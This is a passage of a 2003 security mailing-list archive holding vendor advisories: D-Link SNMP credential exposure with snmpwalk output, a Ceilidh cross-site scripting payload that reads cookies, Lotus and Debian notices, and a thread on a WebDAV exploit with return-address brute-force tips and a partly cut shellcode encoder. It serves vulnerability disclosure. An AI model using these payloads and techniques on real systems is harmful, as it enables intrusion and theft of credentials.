allows read access to the mentioned devices, allowing
enumeration and gathering of sensitive network
information.  

The community name: private 

allows read/write access to devices, thus allowing
change of the network settings of the broadband modem.

Impact: This vulnerability allows local and internet
malicious attackers to retrieve and change network
settings of the modem.

Risk Factor: Medium/High

Possible Solutions:  Firewall UDP port 161 from LAN/WAN
sides, as it is not possible to disable SNMP service
from the web management interface.

Issue 2:
The ISP account information including login name and
password is stored on the modem without encryption,  It
is therefore possible to retrieve this information with
simple SNMP gathering utility such as snmpwalk:

[EMAIL PROTECTED]:~/bugtraq/DSL-modems$ snmpwalk -Os -c
public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
...
...
...
transmission.23.2.3.1.5.2.1 = STRING:
"[EMAIL PROTECTED]"
...
...
transmission.23.2.3.1.6.2.1 = STRING: "password-string"
...
...
... 

Impact: This vulnerability allows LAN and internet
malicious attackers to retrieve confidential information.

Risk Factor: Very High

Possible Solutions:  As a temporary solution you should
firewall UDP port 161 from LAN/WAN sides, as it is not
possible to disable SNMP service from the web
management interface.

According to the Arhont Ltd. policy, all of the found
vulnerabilities and security issues will be reported to
the manufacturer 7 days before releasing them to the
public domains (such as CERT and BUGTRAQ), unless
specifically requested by the manufacturer.

If you would like to get more information about this
issue, please do not hesitate to contact Arhont team at
[EMAIL PROTECTED]


Kind Regards,

Andrei Mikhailovsky
Arhont Ltd
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key:   0xFF67A4F4

[SCSA-013] Cross Site Scripting vulnerability in testcgi.exe

[Grégory]

Security Corporation Security Advisory [SCSA-013]


PROGRAM: Ceilidh
HOMEPAGE: http://www.lilikoi.com
VULNERABLE VERSIONS: 2.70 and prior



DESCRIPTION


"Ceilidh is a Web-based threaded discussion engine that features 
automatic text to HTML conversion, file attachment, e-mail 
notification, automatic message expiration, multiple levels of 
security and much more."
(direct quote from http://www.lilikoi.com) 


DETAILS & EXPLOITS


¤ Cross Site Scripting :

A exploitable bug was found on Ceilidh which cause script
execution on client's computer by following a crafted url.

This kind of attack known as "Cross-Site Scripting Vulnerability" is 
present in testcgi.exe file, an attacker can input specially crafted 
links and/or other malicious scripts.

- Exploits : 

http://[target]/cgi-bin/testcgi.exe?[hostile_code]

The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by <>)


SOLUTIONS


No solution for the moment.


VENDOR STATUS 


The vendor has reportedly been notified.


LINKS


- http://www.security-corp.org/index.php?ink=4-15-1

- Version Française :
http://www.security-corporation.com/index.php?id=advisories&a=013-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com

@(#)Mordred Labs advisory - PHP for Win32: buffer overflow in openlog() function

[sir.mordred]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

//@(#) Mordred Security Labs advisory

Release date: March 27, 2003
Name: PHP for Windows - buffer overflow in openlog() function
Versions affected: all versions for Windows platforms
Risk: average
Author: Sir Mordred ([EMAIL PROTECTED])

I. Description:

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Please visit http://www.php.net for more information about PHP.

II. Details:

There exists a classic stack overflow in the openlog() function and the
following short script will illustrate this vulnerability:

$ cat t1.php


III. Platforms tested

Windows 200 with IIS 5.0 / PHP 4.3.1

III. Workaround

Not available at the time of writing.

IV. Vendor

PHP developers notified.


-BEGIN PGP SIGNATURE-
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wmAEARECACAFAj6DH5sZHHNpci5tb3JkcmVkQGh1c2htYWlsLmNvbQAKCRAOkXvN4BZr
fN4fAJ9EhQBM1k8JukU4JjZ6VTVVi5k/IwCeO8GoK/V4zuG7HbAgXkb2CNlXelg=
=t5SO
-END PGP SIGNATURE-




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Fwd: CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

[Muhammad Faisal Rauf Danka]

Regards

Muhammad Faisal Rauf Danka


*** There is an attachment in this mail. ***

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, 
POP & more! http://www.everyone.net/selectmail?campaign=tag
--- Begin Message ---


-BEGIN PGP SIGNED MESSAGE-

CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino

   Original release date: March 26, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

 * Lotus Notes and Domino versions prior to 5.0.12 and 6.0 Gold
 * VU#571297 affects 5.0.12, 6.0.1 and prior versions.

Overview

   Multiple  vulnerabilities  have  been  reported  to affect Lotus Notes
   clients  and Domino servers. Multiple reporters, the close timing, and
   some ambiguity caused confusion about what releases are vulnerable. We
   are  issuing  this  advisory  to  help  clarify  the  details  of  the
   vulnerabilities,  the  versions affected, and the patches that resolve
   these issues.

I. Description

   In  February  2003, NGS Software released several advisories detailing
   vulnerabilities  affecting  Lotus  Notes  and  Domino.  The  following
   vulnerabilities  reported  by  NGS  Software  affect versions of Lotus
   Domino prior to 5.0.12 and 6.0:

 VU#206361   -  Lotus  iNotes  vulnerable  to  buffer  overflow  via
 PresetFields FolderName field
 Lotus Technical Documentation: KSPR5HUQ59
 NGS Software's Advisory: NISR17022003b

 VU#355169 - Lotus Domino Web Server vulnerable to denial of service
 via incomplete POST request
 Lotus Technical Documentation: KSPR5HTQHS
 NGS Software's Advisory: NISR17022003d

 VU#542873   -  Lotus  iNotes  vulnerable  to  buffer  overflow  via
 PresetFields s_ViewName field
 Lotus Technical Documentation: KSPR5HUPEK
 NGS Software's Advisory: NISR17022003b

 VU#772817  -  Lotus Domino Web Server vulnerable to buffer overflow
 via  non-existent  "h_SetReturnURL"  parameter  with an overly long
 "Host Header" field
 Lotus Technical Documentation: KSPR5HTLW6
 NGS Software's Advisory: NISR17022003a

   The  following vulnerability reported by NGS Software affects versions
   of Lotus Domino up to and including 5.0.12 and 6.0.1:

 VU#571297  -  Lotus  Notes  and  Domino  COM Object Control Handler
 contains buffer overflow
 Lotus Technical Documentation: SWG21104543
 NGS Software's Advisory: NISR17022003e

   VU#571297  was  originally  reported  as  a vulnerability in an iNotes
   ActiveX  control.  The  vulnerable  code  is not specific to iNotes or
   ActiveX.  The  iNotes  ActiveX  control  was  an attack vector for the
   vulnerability and is not the affected code base. Because this issue is
   not  specific  to  ActiveX,  Lotus  Notes  clients  and Domino Servers
   running on platforms other than Microsoft Windows may be affected.

   In March 2003, Rapid7, Inc. released several advisories. The following
   vulnerabilities,  reported  by  Rapid7, Inc., affect versions of Lotus
   Domino prior to 5.0.12:

 VU#433489 - Lotus Domino Server susceptible to a pre-authentication
 buffer overflow during Notes authentication
 Lotus Technical Documentation: DBAR5CJJJS
 Rapid7, Inc.'s Advisory: R7-0010

 VU#411489  -  Lotus Domino Web Retriever contains a buffer overflow
 vulnerability
 Lotus Technical Documentation: KSPR5DFJTR
 Rapid7, Inc.'s Advisory: R7-0011

   Rapid7,  Inc.  also  discovered that Lotus Domino pre-release and beta
   versions of 6.0 were also affected by the following vulnerability:

 VU#583184  -  Lotus  Domino  R5  Server  Family  contains  multiple
 vulnerabilities in LDAP handling code
 Lotus Technical Documentation: DWUU4W6NC8
 Rapid7, Inc.'s Advisory: R7-0012

   VU#583184  was  a  regression  of  the  PROTOS  LDAP  Test-Suite  from
   CA-2001-18 and was originally fixed in 5.0.7a.

II. Impact

   The  impact  of  these vulnerabilities range from denial of service to
   data  corruption  and  the  potential  to  execute arbitrary code. For
   details  about  the impact of a specific vulnerability, please see the
   related vulnerability note.

III. Solution

 Upgrade

   Most  of  these  vulnerabilities  are  resolved in versions 5.0.12 and
   6.0.1 of Lotus Domino.

   Only  VU#571297,  "Lotus  Notes  and Domino COM Object Control Handler
   contains  buffer  overflow,"  is  not  resolved  in  5.0.12, or 6.0.1.
   Critical  Fix  1  for 6.0.1 was released on March 18, 2003, to resolve
   this issue for both the Notes client and Domino server.

 Apply a patch

   Patches  are  available  for  some  vulnerabilities.  Please  view the
   

Re: SNMP security issues in D-Link DSL Broadband Modem/Router

[m.singh]

I told dlink about this problem last year Sepember. They told they will release a fix 
I have not see a fix. 
It looks like dlink will not be doing any thing about this problem. 

In futher I will post here as well. 

Thanks 

Malkit Singh

> 
> From: Arhont Information Security <[EMAIL PROTECTED]>
> Date: 2003/03/27 Thu PM 03:31:41 GMT
> To: [EMAIL PROTECTED]
> Subject: SNMP security issues in D-Link DSL Broadband Modem/Router
> 
> 
> 
> Arhont Ltd-   Information Security Company
> 
> 
> 
> Arhont Advisory by:   Andrei Mikhailovsky (www.arhont.com)
> 
> Advisory: D-Link DSL Broadband Modem/Router 
> 
> Router Model Name:D-Link DSL-500
> 
> Model Specific:   Other models might be vulnerable as well
> 
> Manufacturer site:http://www.dlink.com
> 
> Manufacturer contact (UK):Tel: 0800 9175063 / 0845
> 
> 0800288   
> 
> Contact Date: 06/03/2003
> 
> 
> 
> DETAILS:
> 
> 
> 
> While performing a general security testing of a
> 
> network, we have found several security vulnerability
> 
> issues with the D-Link DSL Broadband Modem DSL-500
> 
> 
> 
> Issue 1:
> 
> The default router installation enables SNMP (Simple
> 
> Network Management Protocol) server with default
> 
> community names for read and read/write access. The
> 
> DSL-500 modem is configured alow SNMP access from the
> 
> WAN (Wide Area Network)/Internet side as well as from LAN.
> 
> 
> 
> [EMAIL PROTECTED]:~/bugtraq/DSL-modems$ snmpwalk -Os -c
> 
> public 192.168.0.1 -v 1
> 
> sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
> 
> Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
> 
> Copyright (c) 2000 Dlink Corp.
> 
> sysObjectID.0 = OID: enterprises.171.10.30.1
> 
> sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47
> 
> ...
> 
> ...
> 
> 
> 
> The community name: public 
> 
> 
> 
> allows read access to the mentioned devices, allowing
> 
> enumeration and gathering of sensitive network
> 
> information.  
> 
> 
> 
> The community name: private 
> 
> 
> 
> allows read/write access to devices, thus allowing
> 
> change of the network settings of the broadband modem.
> 
> 
> 
> Impact: This vulnerability allows local and internet
> 
> malicious attackers to retrieve and change network
> 
> settings of the modem.
> 
> 
> 
> Risk Factor: Medium/High
> 
> 
> 
> Possible Solutions:  Firewall UDP port 161 from LAN/WAN
> 
> sides, as it is not possible to disable SNMP service

> 
> from the web management interface.
> 
> 
> 
> Issue 2:
> 
> The ISP account information including login name and
> 
> password is stored on the modem without encryption,  It
> 
> is therefore possible to retrieve this information with
> 
> simple SNMP gathering utility such as snmpwalk:
> 
> 
> 
> [EMAIL PROTECTED]:~/bugtraq/DSL-modems$ snmpwalk -Os -c
> 
> public 192.168.0.1 -v 1
> 
> sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
> 
> Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
> 
> ...
> 
> ...
> 
> ...
> 
> transmission.23.2.3.1.5.2.1 = STRING:
> 
> "[EMAIL PROTECTED]"
> 
> ...
> 
> ...
> 
> transmission.23.2.3.1.6.2.1 = STRING: "password-string"
> 
> ...
> 
> ...
> 
> ... 
> 
> 
> 
> Impact: This vulnerability allows LAN and internet
> 
> malicious attackers to retrieve confidential information.
> 
> 
> 
> Risk Factor: Very High
> 
> 
> 
> Possible Solutions:  As a temporary solution you should
> 
> firewall UDP port 161 from LAN/WAN sides, as it is not
> 
> possible to disable SNMP service from the web
> 
> management interface.
> 
> 
> 
> According to the Arhont Ltd. policy, all of the found
> 
> vulnerabilities and security issues will be reported to
> 
> the manufacturer 7 days before releasing them to the
> 
> public domains (such as CERT and BUGTRAQ), unless
> 
> specifically requested by the manufacturer.
> 
> 
> 
> If you would like to get more information about this
> 
> issue, please do not hesitate to contact Arhont team at
> 
> [EMAIL PROTECTED]
> 
> 
> 
> 
> 
> Kind Regards,
> 
> 
> 
> Andrei Mikhailovsky
> 
> Arhont Ltd
> 
> http://www.arhont.com
> 
> GnuPG Keyserver: blackhole.pca.dfn.de
> 
> GnuPG Key: 0xFF67A4F4
> 
> 

Re: WebDAV exploit: using wide character decoder scheme

[Roman Medina]

On Wed, 26 Mar 2003 11:14:43 -0500, you wrote:

>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<
>> "%u32ac%u77e2",

 I tried the "%u trick" while coding rs_iis.c exploit and it happened
as Dave stated so I forgot the idea. I was using Spanish W2k Server +
SP2.

 Another problem with Mat's exploit is that it seems not to check well
when the exploit is successful or not. When the exploit has success
(which is impossible at least in Spanish/US Windows versions due to
the %u problem), IIS will not respond neither close the connection so
the exploit keeps waiting until the 15 secs timer expires. Then
$flagexit=1 and sendraw2 function returns "Timeout", so main program
will print "Failed to exploit: Server not crashed\n". This is wrong.
It should have printed something like "Success". It looks like a silly
issue but perhaps the people (with Japanese Windows version?) trying
the exploit never notices it was successful.

 Related to my exploit and after receiving some feedback (thanks
ppl!), I'd like to clarify:
1) The offset between the start of the string and the address where
RET is placed could change. What I did was to put many instances of
the RET value so chances of a right guess were higher. This cover the
cases where offset is incremented or decremented by a 2*x value.
Nevertheless, there will be one align problem if the offset changes by
(2*x+1). In that case, the least significant byte of RET becomes the
more significant one.  Fermín J. Serna <[EMAIL PROTECTED]> pointed the
easy solution: use a RET value with the two bytes being identical. So
the recommended way to perform a brute force attack with rs_iis.c is
to try: 0x0101, 0x0202, 0x0303, ..., 0x (255 possible RET values).
2) I've attached a bash script which demonstrates this and makes
easier the testing of a vulnerable machine. You should adjust the
TIMEOUT variable (in seconds), so IIS is alive when the script tries a
new RET value.

 Regards,
 --Roman

--
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]


rs_brute.sh
Description: Binary data

Re: WebDAV exploit: using wide character decoder scheme

[JW Oh]

In-Reply-To: <[EMAIL PROTECTED]>

>
>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<

I tested it only on Korean version of Windows(Server and Professional 
edition).

>
>This exploit must be much easier to get reliable on other language
>versions. A shame, really.

Shame???

>
>Did you use my encoder or did you write your shellcode manually, just
>out of curiosity?

The encoding scheme is so simple.

This is the shellcode encoder.

-
/*
[EMAIL PROTECTED]
[EMAIL PROTECTED]

Shellcode encoder for webdav exploit.
*/
#include 


int is_special(unsigned char num1)
{
return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 || 
num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f || 
num1==0x2b || num1==0xb || num1==0x5c);
}


void main()
{
int debug=0;
int rc;
unsigned char buffer[512];
while(rc=read(0,buffer,sizeof(buffer)))
{
int i;
for(i=0;i
#include 
#include 

int main(int argc, char* argv[])
{
unsigned char i;
unsigned char j;

for(i=0;i<255;i++)
{
for(j=0;j<255;j++)
{
char string_to_copy[3];
WCHAR src[256]={0,};
char dest[256]={0,};

string_to_copy[0]=i;
string_to_copy[1]=j;
string_to_copy[2]=0;
memcpy(src,string_to_copy,strlen(string_to_copy));
BOOL lpUsedDefaultChar;

WideCharToMultiByte
(CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);

if(!lpUsedDefaultChar)
{
printf("%.2x%.2x\n",j,i);
}
}
}

return 0;
}
-

>
>Dave Aitel
>Advanced Engineering Directorate
>Immunity, Inc.
>http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the
>movies."
>
>On Wed, 26 Mar 2003 22:55:12 +0900
>¿ÀÁ¤¿í <[EMAIL PROTECTED]> wrote:
>> my @return_addresses=(
>> "%u32ac%u77e2",
>> "%uc1b5%u76ae",
>> "%u005d%u77a5",
>

RE: FUD-ALARM: @(#)Mordred Labs advisory - Integer overflow in PHP memory allocator

[Stefan Esser]

Hello Mr. Mordred (and the rest of the Bugtraq readers),

I happily repeat everything I wrote to you before. Your advisories are
FUD. You release an advisory called: Integer overflow in PHP memory
allocator, rate it as High Risk, but you present the reader some stupid
crash bug in the socket extension that is marked as experimental and
is not enabled by default. I told you before, that the integer over-
flow cannot be used to exploit PHP. If you find a single emalloc call
where some user supplied value is able to allocate a block in the size 
of 4 Gigabyte (on 32bit maschines), then you have found a vulnerability.
Just stating that there is a possible integer overflow if someone 
allocates more than 2^32-7 bytes (2^64-7 bytes) is a joke. A vulnerability
that cannot be exploited may not be rated as: high risk. This can be
compared to calling strcpy a security vulnerability because it can be 
used by a stupid PHP core/extension programmer to produce a bufferoverflow.

Stefan Esser


-- 

--
 Stefan Esser[EMAIL PROTECTED]
 e-matters Security http://security.e-matters.de/

 GPG-Keygpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 
 Key fingerprint   B418 B290 ACC0 C8E5 8292  8B72 D6B0 7704 CF6C AE69
--
 Did I help you? Consider a gift:http://wishlist.suspekt.org/
--

[SECURITY] [DSA 271-1] New ecartis and listar packages fix password change vulnerability

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 271-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 27th, 2003http://www.debian.org/security/faq
- --

Package: ecartis, listar
Vulnerability  : unauthorized password change
Problem-Type   : remote
Debian-specific: no
CVE Id : CAN-2003-0162

A problem has been discovered in ecartis, a mailing list manager,
formerly known as listar.  This vulnerability enables an attacker to
reset the password of any user defined on the list server, including
the list admins.

For the stable distribution (woody) this problem has been fixed in
version 0.129a+1.0.0-snap20020514-1.1 of ecartis.

For the old stable distribution (potato) this problem has been fixed
in version 0.129a-2.potato3 of listar.

For the unstable distribution (sid) this problem has been
fixed in version 1.0.0+cvs.20030321-1 of ecartis.

We recommend that you upgrade your ecartis and listar packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 2.2 alias potato
- -

  Source archives:

http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3.dsc
  Size/MD5 checksum:  556 6a598c9cac5f1da997f3790b47711e33

http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3.diff.gz
  Size/MD5 checksum:82819 d8154d1316c73efa71907f026b5a5df4
http://security.debian.org/pool/updates/main/l/listar/listar_0.129a.orig.tar.gz
  Size/MD5 checksum:   323888 0302a199d9e5ee180c9e6e55ee7a0780

  Alpha architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_alpha.deb
  Size/MD5 checksum:   357788 7db5223f510d4d0d03cbf68e2d9a554c

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_alpha.deb
  Size/MD5 checksum:32072 5e63d71fa7a8cd8aed70821f529b5d13

  ARM architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_arm.deb
  Size/MD5 checksum:   335076 5b51113b57b948e9b2b73c06a835dde2

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_arm.deb
  Size/MD5 checksum:32174 1182335a3ce6c842aaef2832cd56db09

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_i386.deb
  Size/MD5 checksum:   301830 aa8d67d1f07cb0a769d2030708e3725c

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_i386.deb
  Size/MD5 checksum:25342 efd78841548a3e97b0d0557e8b360a3d

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_m68k.deb
  Size/MD5 checksum:   308188 fbacaef28d85db28a2d3d5e1e70945ce

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_m68k.deb
  Size/MD5 checksum:28030 2acf707d75e5f1e04cd297b5f1e33a3a

  PowerPC architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_powerpc.deb
  Size/MD5 checksum:   339304 4fb6eaa9bb7a3bc6f7598b6dd77a11b6

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_powerpc.deb
  Size/MD5 checksum:32094 ee010d55634c49190c6c31158474bc11

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_sparc.deb
  Size/MD5 checksum:   343804 f43699c1036fbbacba2ee9f726796208

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_sparc.deb
  Size/MD5 checksum:31450 f0cd070c44790d8afdabd87a01aa3a9f


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/e/ecartis/ecartis_0.129a+1.0.0-snap20020514-1.1.dsc
  Size/MD5 checksum:  633 c12d84d29fc5f3a4d035abe9a4364d59

http://security.debian.org/pool/updates/main/e/ecartis/ecartis_0.129a+1.0.0-snap20020514-1.1.diff.gz
  Size/MD5 checksum:10058 a3a508ca141857099b5a2162ab960d2c

http://security.debian.org/pool/updates/main/e/ecartis/ecartis_0.129a+1.0.0-snap20020514.orig.tar.gz
  Size/MD5 checksum:   326215 2772a595a3fe7ea5073874113da813ec

  Alpha architecture:


http://security.debian.org/pool/updates/main

[SECURITY] [DSA 270-1] New Linux kernel packages (mips + mipsel) fix local root exploit

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 270-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 27sh, 2003http://www.debian.org/security/faq
- --

Packages   : kernel-patch-2.4.17-mips, kernel-patch-2.4.19-mips
Vulnerability  : local privilege escalation
Problem-Type   : local
Debian-specific: no
CVE Id : CAN-2003-0127

The kernel module loader in Linux 2.2 and Linux 2.4 kernels has a flaw
in ptrace.  This hole allows local users to obtain root privileges by
using ptrace to attach to a child process that is spawned by the
kernel.  Remote exploitation of this hole is not possible.

This advisory only covers kernel packages for the big and little endian MIPS
architectures.  Other architectures will be covered by separate advisories.

For the stable distribution (woody) this problem has been fixed in version
2.4.17-0.020226.2.woody1 of kernel-patch-2.4.17-mips (mips+mipsel) and in
version 2.4.19-0.020911.1.woody1 of kernel-patch-2.4.19-mips (mips only).

The old stable distribution (potato) is not affected by this problem
for these architectures since mips and mipsel were first released with
Debian GNU/Linux 3.0 (woody).

For the unstable distribution (sid) this problem has been fixed in
version 2.4.19-0.020911.6 of kernel-patch-2.4.19-mips (mips+mipsel).

We recommend that you upgrade your kernel-images packages immediately.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody1.dsc
  Size/MD5 checksum:  786 937c32a962c27f9461a10d4d2c98c350

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody1.tar.gz
  Size/MD5 checksum:  1140097 e26c4406aa52e77b00df972335fdbb71


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody1.dsc
  Size/MD5 checksum:  832 4e431992276bcd65d34bd07b86784200

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody1.tar.gz
  Size/MD5 checksum:  1035256 cd2e9213d798552a7ebc550903e45bf9

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody1_all.deb
  Size/MD5 checksum:  1142510 b1c1c6d93281938651b91c0caa85b818


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody1_all.deb
  Size/MD5 checksum:  1036948 8de25b980c15831460c844a535b76e3a

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody1_mips.deb
  Size/MD5 checksum:  3494700 3ebb5ff6d044f808b500dfb0f5beccad

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody1_mips.deb
  Size/MD5 checksum:  2038950 baae9c9e139d2b5ef035f01adea32171

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody1_mips.deb
  Size/MD5 checksum:  2039084 5bb6ad7c4207a6f351612fd4e330a337


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:  3897722 8d096cf0e9286e175127dfb1763bfcd2

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:  2072292 3f49ce11a63309465f1ee5c31b54a1c4

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:  2072926 b4ac7b3f74a392c4f7482eb590eadcb2

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:12418 ec83e5bf008c27285768faffcbbd8534

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/ke

TSLSA-2003-0013 - openssl

[Trustix Secure Linux Advisor]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2003-0013

Package name:  openssl
Summary:   Klima-Pokorny-Rosa
Date:  2003-03-26
Affected versions: TSL 1.1, 1.2, 1.5

- --
Package description:
  A C library that provides various crytographic algorithms and protocols,
  including DES, RC4, RSA, and SSL. Includes shared libraries.

Problem description:
  The openssl-0.9.6-13tr was open to the Klima-Pokorny-Rosa attack, this new
  one is patched against this problem.


Action:
  We recommend that all systems with this package installed be upgraded.


Location:
  All TSL updates are available from
  http://www.trustix.net/pub/Trustix/updates/>
  ftp://ftp.trustix.net/pub/Trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.

  Get SWUP from:
  ftp://ftp.trustix.net/pub/Trustix/software/swup/>


Public testing:
  These packages have been available for public testing for some time.
  If you want to contribute by testing the various packages in the
  testing tree, please feel free to share your findings on the
  tsl-discuss mailinglist.
  The testing tree is located at
  http://www.trustix.net/pub/Trustix/testing/>
  ftp://ftp.trustix.net/pub/Trustix/testing/>
  

Questions?
  Check out our mailing lists:
  http://www.trustix.net/support/>


Verification:
  This advisory along with all TSL packages are signed with the TSL sign key.
  This key is available from:
  http://www.trustix.net/TSL-GPG-KEY>

  The advisory itself is available from the errata pages at
  http://www.trustix.net/errata/trustix-1.2/> and
  http://www.trustix.net/errata/trustix-1.5/>
  or directly at
  http://www.trustix.net/errata/misc/2003/TSL-2003-0013-openssl.asc.txt>


MD5sums of the packages:
- --
2eb9af9947c5c5d7dacd9f7c57ecd554  ./1.5/SRPMS/openssl-0.9.6-14tr.src.rpm
edd476d6415bc02c72619a0d431265eb  ./1.5/RPMS/openssl-support-0.9.6-14tr.i586.rpm
b3cf89188d53370e3b2c464b961650db  ./1.5/RPMS/openssl-python-0.9.6-14tr.i586.rpm
c1b9a4ac1d1b67e5ae229de5412d7fd1  ./1.5/RPMS/openssl-devel-0.9.6-14tr.i586.rpm
0a8bfa4733591e793750fdbe9d7a1a84  ./1.5/RPMS/openssl-0.9.6-14tr.i586.rpm
2eb9af9947c5c5d7dacd9f7c57ecd554  ./1.2/SRPMS/openssl-0.9.6-14tr.src.rpm
085059adedd997da456a4d93ab14ed67  ./1.2/RPMS/openssl-support-0.9.6-14tr.i586.rpm
8286dcdd826608af69c5352894114269  ./1.2/RPMS/openssl-python-0.9.6-14tr.i586.rpm
8739e44e2521a11dc4e02ea33695b58f  ./1.2/RPMS/openssl-devel-0.9.6-14tr.i586.rpm
e9f1409e0df82d662310037e89858c18  ./1.2/RPMS/openssl-0.9.6-14tr.i586.rpm
2eb9af9947c5c5d7dacd9f7c57ecd554  ./1.1/SRPMS/openssl-0.9.6-14tr.src.rpm
339fa38a192723922b4e396a58f9954f  ./1.1/RPMS/openssl-support-0.9.6-14tr.i586.rpm
bcc32ddd1b0c780a0b7a82b206ba68f8  ./1.1/RPMS/openssl-python-0.9.6-14tr.i586.rpm
dd3944f2b0917bcd1996c2648f1bd5ad  ./1.1/RPMS/openssl-devel-0.9.6-14tr.i586.rpm
7c61f3f5dd979e2c74d1d096374fe4de  ./1.1/RPMS/openssl-0.9.6-14tr.i586.rpm
- --


